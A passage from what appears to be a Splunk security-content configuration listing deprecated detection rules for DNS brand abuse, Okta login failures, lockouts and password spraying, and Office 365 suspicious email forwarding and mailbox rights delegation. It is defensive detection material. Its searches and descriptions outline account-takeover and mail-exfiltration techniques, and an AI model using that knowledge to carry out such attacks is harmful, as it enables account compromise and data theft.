["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for DNS requests for faux domains similar to the domains that you want to have monitored for abuse. action.notable.param.rule_title = Monitor DNS For Brand Abuse action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(DNS.answer) as IPs min(_time) as firstTime from datamodel=Network_Resolution by DNS.src, DNS.query | `drop_dm_object_name("DNS")` | `security_content_ctime(firstTime)`| `brand_abuse_dns` | `monitor_dns_for_brand_abuse_filter` [ESCU - Multiple Okta Users With Invalid Credentials From The Same IP - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta Multiple Users Failing To Authenticate From Ip`. This analytic identifies multiple failed logon attempts from a single IP in a short period of time. Use this analytic to identify patterns of suspicious logins from a single source and filter as needed or use this to drive tuning for higher fidelity analytics. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1110.003", "T1078", "T1078.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta Multiple Users Failing To Authenticate From Ip`. This analytic identifies multiple failed logon attempts from a single IP in a short period of time. Use this analytic to identify patterns of suspicious logins from a single source and filter as needed or use this to drive tuning for higher fidelity analytics. action.escu.how_to_implement = This search is specific to Okta and requires Okta logs are being ingested in your Splunk deployment. action.escu.known_false_positives = A single public IP address servicing multiple legitmate users may trigger this search. In addition, the threshold of 5 distinct users may be too low for your needs. You may modify the included filter macro `multiple_okta_users_with_invalid_credentials_from_the_same_ip_filter` to raise the threshold or except specific IP adresses from triggering this search. action.escu.creation_date = 2024-02-29 action.escu.modification_date = 2024-02-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Multiple Okta Users With Invalid Credentials From The Same IP - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Suspicious Okta Activity"] action.risk = 1 action.risk.param._risk_message = Multple user accounts have failed to authenticate from a single IP. action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Multiple Okta Users With Invalid Credentials From The Same IP - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Okta Activity"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1110.003", "T1078", "T1078.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta Multiple Users Failing To Authenticate From Ip`. This analytic identifies multiple failed logon attempts from a single IP in a short period of time. Use this analytic to identify patterns of suspicious logins from a single source and filter as needed or use this to drive tuning for higher fidelity analytics. action.notable.param.rule_title = Multiple Okta Users With Invalid Credentials From The Same IP action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` eventType=user.session.start outcome.result=FAILURE | rename client.geographicalContext.country as country, client.geographicalContext.state as state, client.geographicalContext.city as city | stats min(_time) as firstTime max(_time) as lastTime dc(src_user) as distinct_users values(src_user) as users by src_ip, displayMessage, outcome.reason, country, state, city | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search distinct_users > 5| `multiple_okta_users_with_invalid_credentials_from_the_same_ip_filter` [ESCU - O365 Suspicious Admin Email Forwarding - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. **DEPRECATION NOTE** - This search has been deprecated and replaced with `O365 Mailbox Email Forwarding Enabled`. This search detects when an admin configured a forwarding rule for multiple mailboxes to the same destination. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114.003", "T1114"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = **DEPRECATION NOTE** - This search has been deprecated and replaced with `O365 Mailbox Email Forwarding Enabled`. This search detects when an admin configured a forwarding rule for multiple mailboxes to the same destination. action.escu.how_to_implement = You must install splunk Microsoft Office 365 add-on. This search works with o365:management:activity action.escu.known_false_positives = unknown action.escu.creation_date = 2020-12-16 action.escu.modification_date = 2020-12-16 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Suspicious Admin Email Forwarding - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques", "Data Exfiltration"] action.risk = 1 action.risk.param._risk_message = User $user$ has configured a forwarding rule for multiple mailboxes to the same destination $ForwardingAddress$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - O365 Suspicious Admin Email Forwarding - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques", "Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 60, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114.003", "T1114"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Operation=Set-Mailbox | spath input=Parameters | rename Identity AS src_user | search ForwardingAddress=* | stats dc(src_user) AS count_src_user earliest(_time) as firstTime latest(_time) as lastTime values(src_user) AS src_user values(user) AS user by ForwardingAddress | where count_src_user > 1 |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` |`o365_suspicious_admin_email_forwarding_filter` [ESCU - O365 Suspicious Rights Delegation - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. **DEPRECATION NOTE** - This search has been deprecated and replaced with `O365 Elevated Mailbox Permission Assigned`. This analytic identifies instances where potentially suspicious rights are delegated within the Office 365 environment. Specifically, it detects when a user is granted FullAccess, SendAs, or SendOnBehalf permissions on another users mailbox. Such permissions can allow a user to access, send emails from, or send emails on behalf of the target mailbox. The detection leverages O365 audit logs, focusing on the Add-MailboxPermission operation. By parsing the parameters of this operation, the analytic filters for events where FullAccess, SendAs, or SendOnBehalf rights are granted. It then aggregates this data to capture the source user (who was granted the permissions), the destination user (whose mailbox was affected), the specific operation, and the type of access rights granted. Delegating mailbox rights, especially those as powerful as FullAccess, can pose significant security risks. While there are legitimate scenarios for these permissions, such as an executive assistant needing access to an executives mailbox, there are also malicious scenarios where an attacker or a compromised insider might grant themselves unauthorized access to sensitive mailboxes. Monitoring for these permissions changes is crucial to detect potential insider threats, compromised accounts, or other malicious activities.If the detection is a true positive, it indicates that a user has been granted potentially high-risk permissions on another users mailbox. This could lead to unauthorized access to sensitive emails, impersonation through sending emails as or on behalf of the mailbox owner, or data manipulation by altering or deleting emails. Immediate investigation is required to validate the legitimacy of the permission change and to assess the potential risks associated with the granted access. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1114.002", "T1114", "T1098.002", "T1098"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = **DEPRECATION NOTE** - This search has been deprecated and replaced with `O365 Elevated Mailbox Permission Assigned`. This analytic identifies instances where potentially suspicious rights are delegated within the Office 365 environment. Specifically, it detects when a user is granted FullAccess, SendAs, or SendOnBehalf permissions on another users mailbox. Such permissions can allow a user to access, send emails from, or send emails on behalf of the target mailbox. The detection leverages O365 audit logs, focusing on the Add-MailboxPermission operation. By parsing the parameters of this operation, the analytic filters for events where FullAccess, SendAs, or SendOnBehalf rights are granted. It then aggregates this data to capture the source user (who was granted the permissions), the destination user (whose mailbox was affected), the specific operation, and the type of access rights granted. Delegating mailbox rights, especially those as powerful as FullAccess, can pose significant security risks. While there are legitimate scenarios for these permissions, such as an executive assistant needing access to an executives mailbox, there are also malicious scenarios where an attacker or a compromised insider might grant themselves unauthorized access to sensitive mailboxes. Monitoring for these permissions changes is crucial to detect potential insider threats, compromised accounts, or other malicious activities.If the detection is a true positive, it indicates that a user has been granted potentially high-risk permissions on another users mailbox. This could lead to unauthorized access to sensitive emails, impersonation through sending emails as or on behalf of the mailbox owner, or data manipulation by altering or deleting emails. Immediate investigation is required to validate the legitimacy of the permission change and to assess the potential risks associated with the granted access. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = While there are legitimate scenarios for these permissions, such as an executive assistant needing access to an executive's mailbox, there are also malicious scenarios. Investigate and filter as needed. action.escu.creation_date = 2020-12-15 action.escu.modification_date = 2020-12-15 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Suspicious Rights Delegation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques"] action.risk = 1 action.risk.param._risk_message = User $user$ has delegated suspicious rights $AccessRights$ to user $dest_user$ that allow access to sensitive action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - O365 Suspicious Rights Delegation - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques"], "cis20": ["CIS 10"], "confidence": 60, "impact": 80, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1114.002", "T1114", "T1098.002", "T1098"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = **DEPRECATION NOTE** - This search has been deprecated and replaced with `O365 Elevated Mailbox Permission Assigned`. This analytic identifies instances where potentially suspicious rights are delegated within the Office 365 environment. Specifically, it detects when a user is granted FullAccess, SendAs, or SendOnBehalf permissions on another users mailbox. Such permissions can allow a user to access, send emails from, or send emails on behalf of the target mailbox. The detection leverages O365 audit logs, focusing on the Add-MailboxPermission operation. By parsing the parameters of this operation, the analytic filters for events where FullAccess, SendAs, or SendOnBehalf rights are granted. It then aggregates this data to capture the source user (who was granted the permissions), the destination user (whose mailbox was affected), the specific operation, and the type of access rights granted. Delegating mailbox rights, especially those as powerful as FullAccess, can pose significant security risks. While there are legitimate scenarios for these permissions, such as an executive assistant needing access to an executives mailbox, there are also malicious scenarios where an attacker or a compromised insider might grant themselves unauthorized access to sensitive mailboxes. Monitoring for these permissions changes is crucial to detect potential insider threats, compromised accounts, or other malicious activities.If the detection is a true positive, it indicates that a user has been granted potentially high-risk permissions on another users mailbox. This could lead to unauthorized access to sensitive emails, impersonation through sending emails as or on behalf of the mailbox owner, or data manipulation by altering or deleting emails. Immediate investigation is required to validate the legitimacy of the permission change and to assess the potential risks associated with the granted access. action.notable.param.rule_title = O365 Suspicious Rights Delegation action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Operation=Add-MailboxPermission | spath input=Parameters | rename User AS src_user, Identity AS dest_user | search AccessRights=FullAccess OR AccessRights=SendAs OR AccessRights=SendOnBehalf | stats count earliest(_time) as firstTime latest(_time) as lastTime by user src_user dest_user Operation AccessRights |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` |`o365_suspicious_rights_delegation_filter` [ESCU - O365 Suspicious User Email Forwarding - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. **DEPRECATION NOTE** - This search has been deprecated and replaced with `O365 Mailbox Email Forwarding Enabled`. The following analytic detects when multiple users have configured a forwarding rule to the same destination to proactively identify and investigate potential security risks related to email forwarding and take appropriate actions to protect the organizations data and prevent unauthorized access or data breaches. This detection is made by a Splunk query to O365 management activity logs with the operation `Set-Mailbox` to gather information about mailbox configurations. Then, the query uses the `spath` function to extract the parameters and rename the "Identity" field as "src_user" and searches for entries where the "ForwardingSmtpAddress" field is not empty, which indicates the presence of a forwarding rule. Next, the analytic uses the `stats` command to group the results by the forwarding email address and count the number of unique source users (`src_user`). Finally, it filters the results and only retains entries where the count of source users (`count_src_user`) is greater than 1, which indicates that multiple users have set up forwarding rules to the same destination. This detection is important because it suggests that multiple users are forwarding emails to the same destination without proper authorization, which can lead to the exposure of sensitive information, loss of data control, or unauthorized access to confidential emails. Investigating and addressing this issue promptly can help prevent data breaches and mitigate potential damage.indicates a potential security risk since multiple users forwarding emails to the same destination can be a sign of unauthorized access, data exfiltration, or a compromised account. Additionally, it also helps to determine if the forwarding rules are legitimate or if they indicate a security incident. False positives can occur if there are legitimate reasons for multiple users to forward emails to the same destination, such as a shared mailbox or a team collaboration scenario. Next steps include further investigation and context analysis to determine the legitimacy of the forwarding rules. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114.003", "T1114"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = **DEPRECATION NOTE** - This search has been deprecated and replaced with `O365 Mailbox Email Forwarding Enabled`. The following analytic detects when multiple users have configured a forwarding rule to the same destination to proactively identify and investigate potential security risks related to email forwarding and take appropriate actions to protect the organizations data and prevent unauthorized access or data breaches. This detection is made by a Splunk query to O365 management activity logs with the operation `Set-Mailbox` to gather information about mailbox configurations. Then, the query uses the `spath` function to extract the parameters and rename the "Identity" field as "src_user" and searches for entries where the "ForwardingSmtpAddress" field is not empty, which indicates the presence of a forwarding rule. Next, the analytic uses the `stats` command to group the results by the forwarding email address and count the number of unique source users (`src_user`). Finally, it filters the results and only retains entries where the count of source users (`count_src_user`) is greater than 1, which indicates that multiple users have set up forwarding rules to the same destination. This detection is important because it suggests that multiple users are forwarding emails to the same destination without proper authorization, which can lead to the exposure of sensitive information, loss of data control, or unauthorized access to confidential emails. Investigating and addressing this issue promptly can help prevent data breaches and mitigate potential damage.indicates a potential security risk since multiple users forwarding emails to the same destination can be a sign of unauthorized access, data exfiltration, or a compromised account. Additionally, it also helps to determine if the forwarding rules are legitimate or if they indicate a security incident. False positives can occur if there are legitimate reasons for multiple users to forward emails to the same destination, such as a shared mailbox or a team collaboration scenario. Next steps include further investigation and context analysis to determine the legitimacy of the forwarding rules. action.escu.how_to_implement = You must install splunk Microsoft Office 365 add-on. This search works with o365:management:activity action.escu.known_false_positives = unknown action.escu.creation_date = 2020-12-16 action.escu.modification_date = 2020-12-16 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Suspicious User Email Forwarding - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques", "Data Exfiltration"] action.risk = 1 action.risk.param._risk_message = User $user$ configured multiple users $src_user$ with a count of $count_src_user$, a forwarding rule to same destination $ForwardingSmtpAddress$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 48}, {"risk_object_field": "ForwardingSmtpAddress", "risk_object_type": "other", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - O365 Suspicious User Email Forwarding - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques", "Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 60, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114.003", "T1114"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Operation=Set-Mailbox | spath input=Parameters | rename Identity AS src_user | search ForwardingSmtpAddress=* | stats dc(src_user) AS count_src_user earliest(_time) as firstTime latest(_time) as lastTime values(src_user) AS src_user values(user) AS user by ForwardingSmtpAddress | where count_src_user > 1 |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` |`o365_suspicious_user_email_forwarding_filter` [ESCU - Okta Account Locked Out - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta Multiple Accounts Locked Out`. The following analytic utilizes the user.acount.lock event to identify associates who are locked out of Okta. An adversary attempting to brute force or password spray account names may lock accounts out depending on the threshold. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta Multiple Accounts Locked Out`. The following analytic utilizes the user.acount.lock event to identify associates who are locked out of Okta. An adversary attempting to brute force or password spray account names may lock accounts out depending on the threshold. action.escu.how_to_implement = This analytic is specific to Okta and requires Okta logs to be ingested. action.escu.known_false_positives = False positives may be present. Tune Okta and tune the analytic to ensure proper fidelity. Modify risk score as needed. Drop to anomaly until tuning is complete. action.escu.creation_date = 2022-09-21 action.escu.modification_date = 2022-09-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Account Locked Out - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Suspicious Okta Activity", "Okta MFA Exhaustion"] action.risk = 1 action.risk.param._risk_message = $src_user$ account has been locked out. action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Okta Account Locked Out - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Okta Activity", "Okta MFA Exhaustion"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` eventType=user.account.lock | stats count min(_time) as firstTime max(_time) as lastTime values(displayMessage) values(src_user) as user by src_ip eventType status | where count >=3 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `okta_account_locked_out_filter` [ESCU - Okta Account Lockout Events - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta Multiple Accounts Locked Out`. The following anomaly will generate based on account lockout events utilizing Okta eventTypes of user.account.lock.limit or user.account.lock. Per the Okta docs site, this event is fired when a user account has reached the lockout limit. The account will not auto-unlock and a user or client cannot gain access to the account. This event indicates an account that will not be able to log in until remedial action is taken by the account admin. This event can be used to understand the specifics of an account lockout. Often this indicates a client application that is repeatedly attempting to authenticate with invalid credentials such as an old password. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta Multiple Accounts Locked Out`. The following anomaly will generate based on account lockout events utilizing Okta eventTypes of user.account.lock.limit or user.account.lock. Per the Okta docs site, this event is fired when a user account has reached the lockout limit. The account will not auto-unlock and a user or client cannot gain access to the account. This event indicates an account that will not be able to log in until remedial action is taken by the account admin. This event can be used to understand the specifics of an account lockout. Often this indicates a client application that is repeatedly attempting to authenticate with invalid credentials such as an old password. action.escu.how_to_implement = This analytic is specific to Okta and requires Okta logs to be ingested. action.escu.known_false_positives = None. Account lockouts should be followed up on to determine if the actual user was the one who caused the lockout, or if it was an unauthorized actor. action.escu.creation_date = 2022-09-19 action.escu.modification_date = 2022-09-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Account Lockout Events - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Suspicious Okta Activity"] action.risk = 1 action.risk.param._risk_message = The following user $src_user$ has locked out their account within Okta. action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Okta Account Lockout Events - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Okta Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` eventType IN (user.account.lock.limit,user.account.lock) | rename client.geographicalContext.country as country, client.geographicalContext.state as state, client.geographicalContext.city as city | stats count min(_time) as firstTime max(_time) as lastTime values(src_user) by displayMessage, country, state, city, src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_account_lockout_events_filter` [ESCU - Okta Failed SSO Attempts - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. **DEPRECATION NOTE** - This search has been deprecated and replaced with this detection `Okta Unauthorized Access to Application - DM`. The following anomaly identifies failed Okta SSO events utilizing the legacy Okta event "unauth app access attempt". action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = **DEPRECATION NOTE** - This search has been deprecated and replaced with this detection `Okta Unauthorized Access to Application - DM`. The following anomaly identifies failed Okta SSO events utilizing the legacy Okta event "unauth app access attempt". action.escu.how_to_implement = This search is specific to Okta and requires Okta logs are being ingested in your Splunk deployment. action.escu.known_false_positives = There may be a faulty config preventing legitmate users from accessing apps they should have access to. action.escu.creation_date = 2022-09-21 action.escu.modification_date = 2022-09-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Failed SSO Attempts - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Suspicious Okta Activity"] action.risk = 1 action.risk.param._risk_message = $src_user$ failed SSO authentication to the app. action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "user", "risk_score": 16}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Okta Failed SSO Attempts - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Okta Activity"], "cis20": ["CIS 10"], "confidence": 40, "impact": 40, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` eventType=app.generic.unauth_app_access_attempt | stats min(_time) as firstTime max(_time) as lastTime values(app) as Apps count by src_user, result ,displayMessage, src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_failed_sso_attempts_filter` [ESCU - Okta ThreatInsight Login Failure with High Unknown users - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta ThreatInsight Threat Detected`. The following analytic utilizes Oktas ThreatInsight to identify Login failures with high unknown users count and any included secondary outcome reasons. This event will trigger when a brute force attempt occurs with unknown usernames attempted. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001", "T1110.004"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta ThreatInsight Threat Detected`. The following analytic utilizes Oktas ThreatInsight to identify Login failures with high unknown users count and any included secondary outcome reasons. This event will trigger when a brute force attempt occurs with unknown usernames attempted. action.escu.how_to_implement = This search is specific to Okta and requires Okta logs to be ingested in your Splunk deployment. action.escu.known_false_positives = Fidelity of this is high as it is Okta ThreatInsight. Filter and modify as needed. action.escu.creation_date = 2023-03-09 action.escu.modification_date = 2023-03-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta ThreatInsight Login Failure with High Unknown users - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Suspicious Okta Activity"] action.risk = 1 action.risk.param._risk_message = Okta ThreatInsight has detected or prevented a high number of login failures. action.risk.param._risk = [{"risk_object_field": "outcome.reason", "risk_object_type": "other", "risk_score": 50}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Okta ThreatInsight Login Failure with High Unknown users - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Okta Activity"], "cis20": ["CIS 10"], "confidence": 100, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001", "T1110.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta ThreatInsight Threat Detected`. The following analytic utilizes Oktas ThreatInsight to identify Login failures with high unknown users count and any included secondary outcome reasons. This event will trigger when a brute force attempt occurs with unknown usernames attempted. action.notable.param.rule_title = Okta ThreatInsight Login Failure with High Unknown users action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` eventType="security.threat.detected" AND outcome.reason="Login failures with high unknown users count*" | stats count min(_time) as firstTime max(_time) as lastTime values(displayMessage) by user eventType client.userAgent.rawUserAgent client.userAgent.browser outcome.reason | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_threatinsight_login_failure_with_high_unknown_users_filter` [ESCU - Okta ThreatInsight Suspected PasswordSpray Attack - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta ThreatInsight Threat Detected`. The following analytic utilizes Oktas ThreatInsight to identify "PasswordSpray" and any included secondary outcome reasons. This event will trigger when a brute force attempt occurs with unknown usernames attempted. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001", "T1110.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta ThreatInsight Threat Detected`. The following analytic utilizes Oktas ThreatInsight to identify "PasswordSpray" and any included secondary outcome reasons. This event will trigger when a brute force attempt occurs with unknown usernames attempted. action.escu.how_to_implement = This 